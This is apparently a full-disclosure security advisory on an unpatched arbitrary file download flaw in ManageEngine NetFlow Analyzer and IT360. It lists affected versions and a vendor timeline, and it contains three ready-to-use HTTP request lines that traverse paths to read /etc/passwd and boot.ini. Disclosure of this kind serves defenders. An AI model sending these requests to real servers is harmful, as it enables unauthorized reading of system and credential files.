Hi,
This is part 9 of the ManageOwnage series. For previous parts see [1].
Today we have yet another 0 day - an arbitrary file download
vulnerability that be exploited unauthenticated in NetFlow Analyzer
and authenticated in IT360.
I'm releasing this as a 0 day because ManageEngine have been making a
fool out of me for 105 days. I have asked them "are you releasing a
fix soon?" at least a couple of times every month to which they always
responded "yes we will release in the next week/month". And then they
don't release the fix nor provide an explanation. See the advisory
timeline below for details.
An Metasploit auxiliary module that exploits this vulnerability has
been submitted to the Metasploit Framework Github repo in [2].
A full copy of the advisory below can be obtained from my repo in [3].
Regards,
Pedro
Disclosure: 30/11/2014 / Last updated: 30/11/2014
>> Background on the affected product:
"NetFlow Analyzer, a complete traffic analytics tool, leverages flow
technologies to provide real time visibility into the network
bandwidth performance. NetFlow Analyzer, primarily a bandwidth
monitoring tool, has been optimizing thousands of networks across the
World by giving holistic view about their network bandwidth and
traffic patterns. NetFlow Analyzer is a unified solution that
collects, analyzes and reports about what your network bandwidth is
being used for and by whom."
"Managing mission critical business applications is now made easy
through ManageEngine IT360. With agentless monitoring methodology,
monitor your applications, servers and databases with ease. Agentless
monitoring of your business applications enables you high ROI and low
TOC. With integrated network monitoring and bandwidth utilization,
quickly troubleshoot any performance related issue with your network
and assign issues automatically with ITIL based ServiceDesk
integration."
This is being released as a 0-day because ManageEngine have been
twiddling their thumbs (and making a fool out of me) for 105 days. See
timeline below for explanation.
>> Technical details:
Vulnerability: Arbitrary file download
Constraints: unauthenticated in NetFlow; authenticated in IT360
Affected versions: NetFlow v8.6 to v9.9; at least IT360 v10.3 and above
CVE-2014-5445:
GET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd
GET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\boot.ini&pdf=true
CVE-2014-5446
GET /netflow/servlet/DisplayChartPDF?filename=…/…/…/…/boot.ini
All 3 servlets can be exploited in both Windows and Linux. A
Metasploit module that exploits CVE-2014-5445 has been released.
>> Fix:
UNFIXED - ManageEngine failed to take action after 105 days.
Timeline of disclosure:
18/08/2014
19/08/2014
22/08/2014
22/09/2014
20/10/2014
27/10/2014
5/11/2014
28/11/2014
30/11/2014
[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
http://seclists.org/fulldisclosure/2014/Nov/12
http://seclists.org/fulldisclosure/2014/Nov/18
http://seclists.org/fulldisclosure/2014/Nov/21
[2]
https://github.com/rapid7/metasploit-framework/pull/4282
[3]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_netflow_it360_file_dl.txt